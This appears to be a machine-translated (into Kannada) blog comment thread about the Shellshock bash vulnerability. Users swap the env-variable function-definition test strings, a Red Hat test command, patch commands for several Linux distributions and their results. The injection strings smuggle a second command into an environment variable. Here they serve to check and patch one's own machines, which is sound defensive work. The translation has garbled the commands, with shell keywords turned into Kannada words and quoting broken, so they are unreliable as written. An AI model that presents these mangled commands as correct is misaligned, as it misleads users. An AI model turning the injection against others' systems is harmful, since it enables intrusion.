oyoyo ಅವರು ಪ್ಯಾಚ್ನ ಕೆಲವು ವಿವರಗಳಲ್ಲಿ ಇನ್ನೂ ಕೆಲಸ ಮಾಡುತ್ತಿದ್ದಾರೆ ಎಂದು ಹೆಚ್ಚು ವಿಲಕ್ಷಣವಾಗಿ ಹೇಳಬೇಡಿ ... ಇದನ್ನು ಪ್ರಯತ್ನಿಸಿ ಮತ್ತು ನಂತರ ಹೇಳಿ, XD ನಡೆಯಿರಿ
env x = '() {:;}; ಪ್ರತಿಧ್ವನಿ ದುರ್ಬಲ 'ಬ್ಯಾಷ್-ಸಿ "ಪ್ರತಿಧ್ವನಿ ನಾನು ಐಫೋನ್ 6 ಅನುಪಯುಕ್ತಕ್ಕಿಂತ ಹೆಚ್ಚು ದುರ್ಬಲ"
ಓಎಸ್ ಎಕ್ಸ್ ಮೊದಲು ಅವರು ಅದನ್ನು 100% ಪರಿಹರಿಸಿದ್ದರೆ ನಾನು ಏನು ಬೇಕಾದರೂ ಬಾಜಿ ಮಾಡುತ್ತೇನೆ
ಒಳ್ಳೆಯದು, ಆರ್ಸ್ ಟೆಕ್ನಿಕಾದಲ್ಲಿ ಸಹ ಅವರು ಒಎಸ್ಎಕ್ಸ್ನಲ್ಲಿ ಬ್ಯಾಷ್ಗೆ ಪ್ರಸ್ತುತತೆಯನ್ನು ನೀಡುತ್ತಾರೆ.
ಸ್ಪ್ಯಾಮ್ಗಾಗಿ ಓಎಸ್ ಎಕ್ಸ್ ಕುರಿತು y ಯೋಯೋ ಮುಂದಿನ ಕಾಮೆಂಟ್ .. ಲಾ ತು ಸೇವ್ ..
ಉಲ್ಲೇಖಗಳನ್ನು ಸರಿಪಡಿಸಲು ಅಲ್ಲಿ ಅಯೋ ... ಆದರೆ ಉಳಿದವು ನಿಮಗೆ ತಿಳಿದಿದೆ
ಎಫ್ಎಸ್ಎಫ್ ಮಾತನಾಡಿದೆ
https://fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability
ಅವರು ಒಎಸ್ಎಕ್ಸ್ನೊಂದಿಗೆ ಪೋಷಕರಾಗಿರುವಂತೆ (ಓಎಸ್ಎಕ್ಸ್ ಇನ್ನೂ ಬ್ಯಾಷ್ ಅನ್ನು ಬಳಸುತ್ತದೆ: ವಿ).
ಹೇಗಾದರೂ, ನಾನು ಡೆಬಿಯನ್ ಜೆಸ್ಸಿಯೊಂದಿಗೆ ಹೆಚ್ಚು ಗೊಂದಲಕ್ಕೀಡಾಗಬೇಕಾಗಿಲ್ಲ.
ಸೆಂಟ್ ಓಎಸ್ನಲ್ಲಿ ಸಿಸ್ಟಮ್ ದುರ್ಬಲವಾಗಿದ್ದರೆ:
yum all && yum update bash ಅನ್ನು ಸ್ವಚ್ clean ಗೊಳಿಸಿ
ಬ್ಯಾಷ್ ಆವೃತ್ತಿಯನ್ನು ನೋಡಲು:
rpm -qa | ಗ್ರೀಪ್ ಬ್ಯಾಷ್
ಆವೃತ್ತಿಯು ಬ್ಯಾಷ್ -4.1.2-15.el6_5.1 ಗಿಂತ ಮೊದಲಿದ್ದರೆ ನಿಮ್ಮ ಸಿಸ್ಟಮ್ ದುರ್ಬಲವಾಗಬಹುದು!
ಗ್ರೀಟಿಂಗ್ಸ್.
2 ನೇ ದುರ್ಬಲತೆಯನ್ನು ಇನ್ನೂ ಪರಿಹರಿಸಲಾಗಿಲ್ಲ
env amvariable2 = '() {(a) => sh' sh -c "echo amVulnerable"; bash -c "ಪ್ರತಿಧ್ವನಿ ವೈಫಲ್ಯ 2 ಅನ್ಪ್ಯಾಚ್ಡ್"
ನವೀಕರಿಸಲಾಗುತ್ತಿದೆ ...
ಜೆಂಟೂದಲ್ಲಿ ನನಗೆ ವಿರುದ್ಧವಾಗಿ ಸಂಭವಿಸುತ್ತದೆ, ನಾನು ಮೊದಲ ವೈಫಲ್ಯಕ್ಕೆ ಮಾತ್ರ ಗುರಿಯಾಗಿದ್ದೇನೆ ಆದರೆ ಎರಡನೆಯದರೊಂದಿಗೆ ನಾನು ಇದನ್ನು ಪಡೆಯುತ್ತೇನೆ:
[ಕೋಡ್] sh: X: line 1: ಅನಿರೀಕ್ಷಿತ ಅಂಶದ ಬಳಿ ಸಿಂಟ್ಯಾಕ್ಟಿಕ್ ದೋಷ `= '
sh: X: ಸಾಲು 1: ''
sh: `X 'ಗಾಗಿ ಕಾರ್ಯ ವ್ಯಾಖ್ಯಾನವನ್ನು ಆಮದು ಮಾಡಿಕೊಳ್ಳುವಲ್ಲಿ ದೋಷ
sh: ದುರ್ಬಲ: ಆಜ್ಞೆ ಕಂಡುಬಂದಿಲ್ಲ
ಬಗ್ 2 ಪ್ಯಾಚ್ ಮಾಡಿಲ್ಲ
[/ ಕೋಡ್]
ದೋಷಗಳನ್ನು ಪರಿಹರಿಸಿರುವ ಬ್ಯಾಷ್ನ ಸ್ಥಿರ ಆವೃತ್ತಿಯು ಈಗಾಗಲೇ ಇರಬಹುದೇ ಎಂದು ನನಗೆ ಗೊತ್ತಿಲ್ಲ, ಆದರೆ ಮುಂದಿನ ಬಾರಿ ನಾನು ಹೊರಹೊಮ್ಮುವಾಗ ಅದು ಬಾಕಿ ಉಳಿದಿದೆ-ಸಿಂಕ್ && ಹೊರಹೊಮ್ಮುವುದು –ಅಪ್ಡೇಟ್ –ಡೀಪ್ -ವಿತ್-ಬಿಡೆಪ್ಸ್ = ಮತ್ತು - ಹೊಸ ಬಳಕೆ @ ವರ್ಲ್ಡ್ (ಇಡೀ ವ್ಯವಸ್ಥೆಯನ್ನು ನಾನು ಹೇಗೆ ನವೀಕರಿಸುತ್ತೇನೆ).
ನಾನು ಆವೃತ್ತಿ 4.2_p50 ನೊಂದಿಗೆ ಜೆಂಟೂ ಹೊಂದಿದ್ದೇನೆ ಮತ್ತು ಇಲ್ಲಿಯವರೆಗೆ ಅದು ಎಲ್ಲಾ ಪರೀಕ್ಷೆಗಳಲ್ಲಿ ಉತ್ತೀರ್ಣವಾಗಿದೆ. ಉದಯೋನ್ಮುಖ-ಸಿಂಕ್ ಅನ್ನು ಪ್ರಯತ್ನಿಸಿ ಮತ್ತು ನಂತರ -av1 ಅಪ್ಲಿಕೇಶನ್-ಚಿಪ್ಪುಗಳು / ಬ್ಯಾಷ್ ಅನ್ನು ಹೊರಹೊಮ್ಮಿಸಿ, ತದನಂತರ ನೀವು ಬ್ಯಾಷ್ -ವರ್ಷನ್ ಆಜ್ಞೆಯನ್ನು ಬಳಸಿಕೊಂಡು ಆವೃತ್ತಿ 4.2_p50 ಅನ್ನು ಹೊಂದಿರುವಿರಾ ಎಂದು ಪರಿಶೀಲಿಸಿ.
ನೀವು ಇದನ್ನು ಪ್ರಯತ್ನಿಸಿದ್ದೀರಾ?
ಮತ್ತು ಹೊಸ ಪ್ಯಾಕೇಜ್ಗಳೊಂದಿಗೆ, Red Hat ನಮಗೆ ಒದಗಿಸುವ ಹೊಸ ಪರೀಕ್ಷೆ
cd / tmp; rm -f / tmp / echo; env 'x = () {(a) => bas' bash -c "ಪ್ರತಿಧ್ವನಿ ದಿನಾಂಕ"; ಬೆಕ್ಕು / ಟಿಎಂಪಿ / ಪ್ರತಿಧ್ವನಿ
ನಮ್ಮ ಸಿಸ್ಟಮ್ ದುರ್ಬಲವಾಗದಿದ್ದರೆ ಮತ್ತು ಸರಿಯಾಗಿ ತೇಪೆ ಹಾಕಿದ್ದರೆ, ಅದು ನಮಗೆ ಈ ರೀತಿಯದನ್ನು ನೀಡಬೇಕಾಗುತ್ತದೆ
1 ದಿನಾಂಕ
2 ಬೆಕ್ಕು: / tmp / echo: ಫೈಲ್ ಅಥವಾ ಡೈರೆಕ್ಟರಿ ಅಸ್ತಿತ್ವದಲ್ಲಿಲ್ಲ
ಈ ರೀತಿ ಪ್ರಯತ್ನಿಸಿ:
env X = '() {(a) => sh' sh -c "ಪ್ರತಿಧ್ವನಿ ದುರ್ಬಲ"; bash -c "ಪ್ರತಿಧ್ವನಿ ವೈಫಲ್ಯ 2 ತೇಪೆ"
ನಾನು ಪಡೆಯುತ್ತೇನೆ
ದುರ್ಬಲ
ಬಗ್ 2 ಪ್ಯಾಚ್ ಮಾಡಲಾಗಿದೆ.
ಅದನ್ನು ಮರೆತುಬಿಡಿ, ರೇಖೆಯನ್ನು ಕೆಟ್ಟದಾಗಿ ಫಾರ್ಮ್ಯಾಟ್ ಮಾಡಲಾಗಿದೆ.
ಅತ್ಯುತ್ತಮ! ನನ್ನ ಸ್ಲಾಕ್ವೇರ್ನಲ್ಲಿ ನಾನು ಈಗಾಗಲೇ ನವೀಕರಣವನ್ನು ಮಾಡಿದ್ದೇನೆ, ಧನ್ಯವಾದಗಳು!
ಹಾಯ್, ಒಂದು ಪ್ರಶ್ನೆ ಉದ್ಭವಿಸುತ್ತದೆ, ನನ್ನ ಬಳಿ "SUSE Linux Enterprise Server 10" 64 ಬಿಟ್ಗಳೊಂದಿಗೆ ಹಲವಾರು ಸರ್ವರ್ಗಳಿವೆ.
ನಾನು ದುರ್ಬಲವಾಗಿರುವ ಆಜ್ಞೆಗಳನ್ನು ಕಾರ್ಯಗತಗೊಳಿಸಿದಾಗ, ಐಫೋನ್ 6 ಎಕ್ಸ್ಡಿ ಕಸಕ್ಕಿಂತಲೂ ನಾನು ಹೆಚ್ಚು ದುರ್ಬಲ
SUSE ನಲ್ಲಿ ಪ್ಯಾಕೇಜ್ಗಳನ್ನು ನವೀಕರಿಸಲು / ಸ್ಥಾಪಿಸಲು ನಾನು ತಪ್ಪಿಲ್ಲದಿದ್ದರೆ ಅದನ್ನು «y ೈಪ್ಪರ್ command ಆಜ್ಞೆಯೊಂದಿಗೆ ಮಾಡಲಾಗುತ್ತದೆ.
ಕೆಲವು ಸರ್ವರ್ಗಳಲ್ಲಿ ಇದು ನನಗೆ ಇದನ್ನು ಹೇಳುತ್ತದೆ:
BIAL: ~ # y ಿಪ್ಪರ್ ಅಪ್
-bash: zypper: ಆಜ್ಞೆ ಕಂಡುಬಂದಿಲ್ಲ
BIAL: ~ #
ಮತ್ತು ಇತರರಲ್ಲಿ ಇದು:
SMB: ~ # ipp ಿಪ್ಪರ್ ಅಪ್
ಸಿಸ್ಟಮ್ ಮೂಲಗಳನ್ನು ಮರುಸ್ಥಾಪಿಸಲಾಗುತ್ತಿದೆ…
SUSE Linux Enterprise Server 10 SP2-20100319-161944 ಗಾಗಿ ಮೆಟಾಡೇಟಾವನ್ನು ಪಾರ್ಸಿಂಗ್ ಮಾಡಲಾಗುತ್ತಿದೆ…
ಆರ್ಪಿಎಂ ಡೇಟಾಬೇಸ್ ಅನ್ನು ಪಾರ್ಸಿಂಗ್ ಮಾಡಲಾಗುತ್ತಿದೆ ...
ಸಾರಾಂಶ:
ಮಾಡಲು ಏನೂ ಇಲ್ಲ.
ನಾನು ಏನು ಮಾಡುತ್ತೇನೆ?
ಕೆಲವರು ಅದನ್ನು ಚಿತ್ರಿಸುವುದಕ್ಕಿಂತ ದುರ್ಬಲತೆ ಕಡಿಮೆ ಎಂದು ನನಗೆ ತಿಳಿದಿದೆ ಆದರೆ ನನ್ನ ಬಳಿ ಇದೆ ಮತ್ತು ನಾನು ಸಣ್ಣ ಅಥವಾ ದೊಡ್ಡದಾಗಿದ್ದರೂ ಅಪಾಯಕ್ಕೆ ಒಳಗಾಗಲು ಬಯಸುವುದಿಲ್ಲ.
ಗ್ರೀಟಿಂಗ್ಸ್.
ಶುಭ ಸಂಜೆ, ಲೇಖನದಲ್ಲಿ ನೀವು ಒದಗಿಸಿದ ಕೋಡ್ ಅನ್ನು ಅಂಟಿಸಲು ನಾನು ಪ್ರಯತ್ನಿಸಿದೆ, ನಾನು ಇದನ್ನು ಪಡೆಯುತ್ತೇನೆ
ಸ್ಯಾಂಡರ್ಸ್ @ pc-sanders: ~ $ env x = '() {:;}; ಪ್ರತಿಧ್ವನಿ ದುರ್ಬಲ 'ಬ್ಯಾಷ್-ಸಿ "ಪ್ರತಿಧ್ವನಿ ಇದು ಒಂದು ಪರೀಕ್ಷೆ"
ಇದು ಒಂದು ಪರೀಕ್ಷೆ
ಸ್ಯಾಂಡರ್ಸ್ @ ಪಿಸಿ-ಸ್ಯಾಂಡರ್ಸ್: ~ $
ಡಿಸ್ಟ್ರೋವನ್ನು ಹೇಗೆ ಪ್ಯಾಚ್ ಮಾಡುವುದು ಎಂದು ದಯವಿಟ್ಟು ನನಗೆ ವಿವರಿಸುತ್ತೀರಾ, ನಾನು ಪ್ರತಿದಿನ ನವೀಕರಿಸುತ್ತೇನೆ ಮತ್ತು ಪ್ರಾಂಪ್ಟ್ನ output ಟ್ಪುಟ್ನಲ್ಲಿ ಬದಲಾವಣೆಗಳನ್ನು ನಾನು ಕಾಣುವುದಿಲ್ಲ.
ಧನ್ಯವಾದಗಳು!